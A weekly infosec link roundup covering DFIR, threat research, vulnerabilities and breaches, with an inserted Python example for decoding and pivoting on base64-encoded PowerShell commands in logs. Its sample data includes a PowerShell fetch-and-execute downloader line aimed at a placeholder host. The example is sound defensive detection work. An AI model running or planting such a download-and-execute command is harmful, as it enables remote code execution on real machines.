Summary
A collection of infosec links to Tools & Tips, Threat Research, and more! The focus trends toward DFIR and threat intelligence, but general information security and hacking-related topics are included as well. This list is neither vetted nor intended to be an exhaustive source. Keeping up with the enormous volume of security-related information is a daunting task, but this is my way of filtering the most useful items and improving the signal-to-noise ratio. The summaries are provided with links for the reader to drill down into particular topics according to their own interests.
This week brings another great round of information, ranging from news on high-dollar FTC settlements to Business Email Compromise (BEC) and ransomware trends.
Highlights (editor's top picks):
- The FTC draws big settlements from Facebook and Equifax
- An interesting BEC trend analysis from FinCEN
- The FBI releases master decryption keys for GandCrab ransomware
- An awesome process flow diagram of best practices for adding OSINT information into MISP
- isodump.py, a simple Python script for analyzing malicious ISO files
- Deriving intelligence from LNK files
- A Deep Dive Into BokBot (IcedID) Malware: Analysis of the Core Payload
Industry Reports, News, and Miscellany
- Businesses Grow More Vulnerable to Email Attacks, Even with Improved Defenses
- Stolen Payment Data: Infected Ecommerce Website to Darknet Markets
- Top Targets for Business Email Compromise: Financial Crimes Enforcement Network (FinCEN), Financial Trend Analysis
- Meet the World’s Biggest ‘Bulletproof’ Hoster
- Teams are Systems too! A systems perspective on teamwork and leadership.
- Trust is overrated: Don’t be fooled by threats on your internal network
- Active Cyber Defence (ACD) – The Second Year | examining how the NCSC’s ACD programme is improving the security of the UK public sector and the wider UK cyber ecosystem.
- FBI Releases Master Decryption Keys for GandCrab Ransomware
- DFIR Research papers from @DFRWS posted to dfrws.org archive
- Where the Holes Aren’t | A story from WWII and its applicability for today’s risk management
- My browser, the spy: How extensions slurped up browsing histories from 4M users
Tools and Tips
- Hurricanes, Politics, and Sports: How to Defend Against Juicy, Topical Phishing Campaigns
- 5 Tips for a Happy Marriage Between IT Cybersecurity and Operational Technology Teams
- Analysis of DNS TXT Records
- isodump.py and Malicious ISO Files
- Detection Engineering: Setting Objectives and Scaling for Growth
- Upcoming feature in Sigma: Value Modifiers
- Base64 Encoded Powershell Pivots
- PowerShell & Python: A side-by-side comparison | markdown files for Josh Rickard’s (@MSAdministrator) presentation at BSides Springfield (MO)
- Active Directory Health Checklist
- StreamIO domain/cert monitoring
- The 10 Essentials of Infosec Forensics
- Docker for Pentesters
- New version of Sigma2SplunkAlert with cleaner code and custom search transformations
- Zeke on Zeek: Working With Open-Source Zeek: Adding a Key-value For-Loop
- InfinityHook: Hook system calls, context switches, page faults, DPCs and more.
- Misp-osint-collection: A process with best practices to add OSINT gathered information into MISP
- Running queries on Microsoft Defender Advanced Threat Protection
- Enter Sandbox 26: Logs from 1.6M sandboxed samples – a bit of history, a bit of a requiem
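The "Base64 Encoded Powershell Pivots" entry above is a title only, so here is an added example of the mechanics behind that kind of pivot (this is not code from the linked post or from any tool on this page). PowerShell's -EncodedCommand parameter takes a base64 string of UTF-16LE text, and the parameter name may be abbreviated, so the same script shows up in process-creation logs under different flags and, after trivial whitespace changes, under different base64 strings. Decoding the payload and keying on a normalised form of the decoded script lets you pivot across hosts on what actually ran. The host names, command lines and scripts below are constructed sample data; the list of accepted flag abbreviations is an assumption (representative, not exhaustive).

```python
import base64
import binascii
import hashlib
import re
from collections import defaultdict

# Abbreviations of -EncodedCommand this example recognises (assumption: representative,
# not exhaustive). The flag must be preceded by whitespace and followed by a base64 blob.
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)
# Second-stage blobs commonly wrapped in [Convert]::FromBase64String('...') inside the script.
INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    if len(raw) % 2:  # UTF-16LE payloads are always an even number of bytes
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return None


def decode_inner_blobs(script):
    """Decode FromBase64String('...') blobs inside a decoded script (UTF-8 text only)."""
    out = []
    for blob in INNER_B64.findall(script):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out


def pivot_by_payload(events):
    """Group (host, cmdline) events by SHA-256 of the whitespace-normalised decoded script."""
    groups = defaultdict(list)
    for host, cmdline in events:
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        key = hashlib.sha256(" ".join(script.split()).encode("utf-8")).hexdigest()
        groups[key].append({"host": host, "script": script, "inner": decode_inner_blobs(script)})
    return dict(groups)


def encode_for_powershell(script):
    """Encode text the way -EncodedCommand expects (base64 of UTF-16LE); used to build samples."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample data: a downloader with an inner base64 URL, and a benign one-liner.
INNER_URL = base64.b64encode(b"http://example.invalid/stage2").decode("ascii")
SCRIPT_A = (
    f"$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{INNER_URL}'));"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
SCRIPT_B = "Get-Process | Out-File C:\\temp\\p.txt"

SAMPLE_EVENTS = [
    ("WS01", "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(SCRIPT_A)),
    ("WS02", "powershell.exe -ec " + encode_for_powershell(SCRIPT_A)),            # abbreviated flag
    ("WS03", "powershell.exe -EncodedCommand " + encode_for_powershell("  " + SCRIPT_A + "  ")),  # padded
    ("WS04", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inv.ps1"),  # nothing encoded
    ("WS05", "powershell.exe -e " + encode_for_powershell(SCRIPT_B)),
]

if __name__ == "__main__":
    for key, hits in pivot_by_payload(SAMPLE_EVENTS).items():
        print(key[:16], [h["host"] for h in hits], hits[0]["inner"])
```

Three different raw base64 strings collapse to one pivot key for WS01, WS02 and WS03, which is the point: pivot on the decoded, normalised script (and on anything decoded out of it, such as the inner URL), not on the base64 text as it appears in the command line.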
Threat Research – Malware, Phishing, and other Campaigns in the Wild
- Anti-Debugging Techniques from a Complex Visual Basic Packer
- This Phishing Attacker Takes American Express—and Victims’ Credentials
- Abusing Microsoft’s Azure domains to host phishing attacks
- The Avast Abuser: Metamorfo Banking Malware Hides by Abusing Avast Executable
- I Can’t Believe Mirais: Tracking the Infamous IoT Malware
- Newly Discovered Malware Framework Cashing in on Ad Fraud
- With FaceApp in the spotlight, new scams emerge
- Newly identified StrongPity operations
- A Deep Dive Into IcedID Malware: Part II – Analysis of the Core IcedID Payload (Parent Process)
- Turla renews its arsenal with Topinambour
- Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void
- SLUB Gets Rid of GitHub, Intensifies Slack Use
- Old Tools for New Money: URL Spreading Shellbot and XMRig Using 17-year old XHide
- Targeted Ransomware: Proliferating Menace Threatens Organizations
- SWEED: Exposing years of Agent Tesla campaigns
- An Analysis of L0rdix RAT, Panel and Builder
- Threat Spotlight: Virlock Polymorphic Ransomware
- EvilGnome: Rare Malware Spying on Linux Desktop Users
- Hard Pass: Declining APT34’s Invite to Join Their Professional Network
- Copycat of APT Sidewinder?
- Deriving intelligence from LNK files
- Targeted TrickBot activity drops ‘PowerBrace’ backdoor
Vulnerabilities and Exploits
- Oracle Quarterly Critical Patches Issued July 16, 2019
- Technology Security Alert – Exploitation of Ellucian Banner System Vulnerability
- Cylance, I Kill You!
- Unsanitized file validation leads to malicious payload download via Office binaries
- Achieving persistence in Slack through local file injection
- Understanding Docker container escapes
Breaches, Government, and Law Enforcement
- Contractor who stole 50TB of NSA data gets nine years in prison
- Facebook’s FTC fine will be $5 billion—or one month’s worth of revenue
- Equifax reportedly close to $700 million data breach settlement
- Kazakhstan government is now intercepting all HTTPS traffic